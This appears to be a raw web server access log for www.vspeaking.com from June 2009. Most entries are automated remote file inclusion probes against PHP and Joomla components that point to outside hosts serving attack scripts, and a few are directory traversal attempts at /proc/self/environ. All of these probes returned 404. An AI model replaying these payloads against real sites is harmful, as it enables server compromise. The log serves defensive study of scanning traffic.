84.201.208.50 - - [29/Jun/2009:01:39:58 -0700] "GET /logs/index.php?meio.php=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
84.201.208.50 - - [29/Jun/2009:01:39:58 -0700] "GET /logs/access_090413.log/index.php?meio.php=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
84.201.208.50 - - [29/Jun/2009:01:39:58 -0700] "GET /index.php?meio.php=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
216.246.98.115 - - [29/Jun/2009:01:40:00 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
83.98.209.71 - - [29/Jun/2009:01:40:56 -0700] "GET /index.php?meio.php=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.98.209.71 - - [29/Jun/2009:01:40:56 -0700] "GET /logs/access_090413.log/index.php?meio.php=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.98.209.71 - - [29/Jun/2009:01:40:56 -0700] "GET /logs/index.php?meio.php=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
84.201.208.50 - - [29/Jun/2009:01:42:15 -0700] "GET /logs/access.log/index.php?meio.php=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.98.209.71 - - [29/Jun/2009:01:42:28 -0700] "GET /logs/access.log/index.php?meio.php=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
65.55.209.4 - - [29/Jun/2009:01:43:38 -0700] "GET /tmp/?N=D HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.vspeaking.com"
64.186.128.233 - - [29/Jun/2009:01:43:48 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
216.246.98.115 - - [29/Jun/2009:01:46:20 -0700] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.246.98.115 - - [29/Jun/2009:01:46:20 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.246.98.115 - - [29/Jun/2009:01:46:20 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.246.98.115 - - [29/Jun/2009:01:46:29 -0700] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.246.98.115 - - [29/Jun/2009:01:46:30 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.246.98.115 - - [29/Jun/2009:01:46:30 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
211.203.180.144 - - [29/Jun/2009:01:47:13 -0700] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
211.203.180.144 - - [29/Jun/2009:01:47:13 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
211.203.180.144 - - [29/Jun/2009:01:47:13 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
211.203.180.144 - - [29/Jun/2009:01:47:23 -0700] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
211.203.180.144 - - [29/Jun/2009:01:47:23 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
211.203.180.144 - - [29/Jun/2009:01:47:23 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
211.203.180.144 - - [29/Jun/2009:01:47:27 -0700] "GET /logs/access_090105.log/modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
211.203.180.144 - - [29/Jun/2009:01:47:31 -0700] "GET /logs/access_090105.log/modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
83.98.209.71 - - [29/Jun/2009:01:48:19 -0700] "GET /logs/index.php?meio=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.98.209.71 - - [29/Jun/2009:01:48:19 -0700] "GET /index.php?meio=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.98.209.71 - - [29/Jun/2009:01:48:22 -0700] "GET /logs/access.log/index.php?meio=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
64.186.128.233 - - [29/Jun/2009:01:48:44 -0700] "GET /logs/access_090413.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.98.209.71 - - [29/Jun/2009:01:50:02 -0700] "GET /logs/access_090413.log/index.php?meio=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
84.201.208.50 - - [29/Jun/2009:01:51:13 -0700] "GET /logs/index.php?meio=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
84.201.208.50 - - [29/Jun/2009:01:51:13 -0700] "GET /index.php?meio=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
84.201.208.50 - - [29/Jun/2009:01:51:14 -0700] "GET /logs/access_090413.log/index.php?meio=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
211.203.180.144 - - [29/Jun/2009:01:53:03 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
211.203.180.144 - - [29/Jun/2009:01:53:03 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
211.203.180.144 - - [29/Jun/2009:01:53:03 -0700] "GET /logs/access.log%20%20/modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
211.203.180.144 - - [29/Jun/2009:01:53:11 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
211.203.180.144 - - [29/Jun/2009:01:53:11 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
211.203.180.144 - - [29/Jun/2009:01:53:11 -0700] "GET /logs/access.log%20%20/modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
211.203.180.144 - - [29/Jun/2009:01:54:17 -0700] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
211.203.180.144 - - [29/Jun/2009:01:54:22 -0700] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
87.16.83.70 - - [29/Jun/2009:01:54:51 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
87.16.83.70 - - [29/Jun/2009:01:54:57 -0700] "GET /lostpasswd.php?env[include_prefix]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
87.16.83.70 - - [29/Jun/2009:01:54:57 -0700] "GET /logs/access.log%20%20/lostpasswd.php?env[include_prefix]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
84.201.208.50 - - [29/Jun/2009:01:55:08 -0700] "GET /logs/access.log/index.php?meio=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
86.39.131.85 - - [29/Jun/2009:01:57:16 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
86.39.131.85 - - [29/Jun/2009:01:57:16 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
86.39.131.85 - - [29/Jun/2009:01:57:16 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
84.201.208.50 - - [29/Jun/2009:01:58:47 -0700] "GET /index.php?meio=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
84.201.208.50 - - [29/Jun/2009:01:58:47 -0700] "GET /logs/index.php?meio=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
84.201.208.50 - - [29/Jun/2009:01:58:47 -0700] "GET /logs/access_090413.log/index.php?meio=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
86.39.131.85 - - [29/Jun/2009:01:58:57 -0700] "GET /logs/access.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.98.209.71 - - [29/Jun/2009:01:59:05 -0700] "GET /administrator/components/com_rsgallery/config.rsgallery.php?mosConfig_absolute_path=http://info.glandeves.fr//xoops_lib/modules/protector/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
83.98.209.71 - - [29/Jun/2009:01:59:05 -0700] "GET /logs/access.log//administrator/components/com_rsgallery/config.rsgallery.php?mosConfig_absolute_path=http://info.glandeves.fr//xoops_lib/modules/protector/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
83.98.209.71 - - [29/Jun/2009:01:59:05 -0700] "GET /logs//administrator/components/com_rsgallery/config.rsgallery.php?mosConfig_absolute_path=http://info.glandeves.fr//xoops_lib/modules/protector/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
84.201.208.50 - - [29/Jun/2009:02:02:27 -0700] "GET /logs/access.log/index.php?meio=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
87.16.83.70 - - [29/Jun/2009:02:10:33 -0700] "GET /logs/access_090413.log/lostpasswd.php?env[include_prefix]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
66.197.183.69 - - [29/Jun/2009:02:11:15 -0700] "GET /usr/sbin/httpd? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.vspeaking.com"
66.197.183.69 - - [29/Jun/2009:02:13:01 -0700] "GET /logs/access.log//usr/sbin/httpd? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.vspeaking.com"
66.197.183.69 - - [29/Jun/2009:02:13:01 -0700] "GET /usr/sbin/httpd? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.vspeaking.com"
66.197.183.69 - - [29/Jun/2009:02:13:01 -0700] "GET /logs//usr/sbin/httpd? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.vspeaking.com"
94.23.2.21 - - [29/Jun/2009:02:14:11 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
94.23.2.21 - - [29/Jun/2009:02:14:11 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
94.23.2.21 - - [29/Jun/2009:02:14:11 -0700] "GET /logs/scripts.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
211.189.18.73 - - [29/Jun/2009:02:14:22 -0700] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
211.189.18.73 - - [29/Jun/2009:02:14:22 -0700] "GET /logs/access_090413.log//modules/agendax/addevent.inc.php?agendax_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
211.189.18.73 - - [29/Jun/2009:02:14:22 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
212.83.2.61 - - [29/Jun/2009:02:14:29 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.vspeaking.com"
212.83.2.61 - - [29/Jun/2009:02:14:29 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.vspeaking.com"
83.98.209.71 - - [29/Jun/2009:02:15:30 -0700] "GET /components/com_rsgallery/config.rsgallery.php?mosConfig_absolute_path=http://info.glandeves.fr//xoops_lib/modules/protector/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
83.98.209.71 - - [29/Jun/2009:02:15:30 -0700] "GET /logs/components/com_rsgallery/config.rsgallery.php?mosConfig_absolute_path=http://info.glandeves.fr//xoops_lib/modules/protector/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
83.98.209.71 - - [29/Jun/2009:02:15:30 -0700] "GET /logs/access.log/components/com_rsgallery/config.rsgallery.php?mosConfig_absolute_path=http://info.glandeves.fr//xoops_lib/modules/protector/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
94.23.2.21 - - [29/Jun/2009:02:16:12 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
94.23.2.21 - - [29/Jun/2009:02:16:12 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
94.23.2.21 - - [29/Jun/2009:02:16:12 -0700] "GET /logs/scripts.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
94.23.2.21 - - [29/Jun/2009:02:17:56 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
94.23.2.21 - - [29/Jun/2009:02:17:56 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
94.23.2.21 - - [29/Jun/2009:02:17:57 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
94.23.2.21 - - [29/Jun/2009:02:17:57 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
207.210.89.18 - - [29/Jun/2009:02:20:40 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.vspeaking.com"
207.210.89.18 - - [29/Jun/2009:02:20:40 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.vspeaking.com"
207.210.89.18 - - [29/Jun/2009:02:20:40 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.vspeaking.com"
207.210.89.18 - - [29/Jun/2009:02:20:41 -0700] "GET /logs/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.vspeaking.com"
207.210.89.18 - - [29/Jun/2009:02:20:41 -0700] "GET /logs/access.log/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.vspeaking.com"
207.210.89.18 - - [29/Jun/2009:02:20:41 -0700] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.vspeaking.com"
207.210.89.18 - - [29/Jun/2009:02:20:41 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
207.210.89.18 - - [29/Jun/2009:02:20:41 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
207.210.89.18 - - [29/Jun/2009:02:20:41 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
207.210.89.18 - - [29/Jun/2009:02:20:41 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
207.210.89.18 - - [29/Jun/2009:02:20:41 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
207.210.89.18 - - [29/Jun/2009:02:20:41 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:02:24:26 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:02:24:26 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:02:24:27 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:02:24:28 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:02:24:28 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:02:24:28 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:02:25:09 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:02:25:10 -0700] "GET /logs/access.log%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:02:25:10 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
87.16.83.70 - - [29/Jun/2009:02:25:11 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:02:25:49 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:02:25:50 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:02:25:50 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:02:26:01 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:02:26:02 -0700] "GET /logs/access.log%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:02:26:02 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:02:26:53 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:02:26:53 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:02:26:53 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
65.55.209.8 - - [29/Jun/2009:02:28:18 -0700] "GET /?S=A HTTP/1.1" 200 779 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.vspeaking.com"
